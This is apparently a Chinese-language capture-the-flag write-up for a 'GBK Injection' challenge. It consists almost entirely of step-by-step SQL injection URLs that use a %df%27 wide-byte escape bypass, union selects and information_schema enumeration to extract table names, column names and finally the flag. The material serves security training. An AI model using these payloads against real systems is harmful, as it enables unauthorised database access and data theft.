GBK Injection想到宽字节注入,首先了解宽字节注入的原理
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 order by 2#
发现#被过滤掉了,遂使用%23(url编码)
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 order by 2%23
判断出表中有两列,就可以用:union select获取当前的库了
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 union select 1,database()%23
没有爆出库的信息emm…因为没有and 1=2,又因为这个地方可能只接受一个参数
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 and 1=2 union select 1,database()%23
当前的库名为sae-chinalover,通过库名爆表名
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7361652D6368696E616C6F766572%23
爆news表的列
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x6E657773%23
得出id,title两列
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 and 1=2 union select 1,group_concat(id,title) from news limit 0,1%23
发现没有flag,按照上面的流程重复
在ctf4表中找到flag
flag{this_is_sqli_flag}
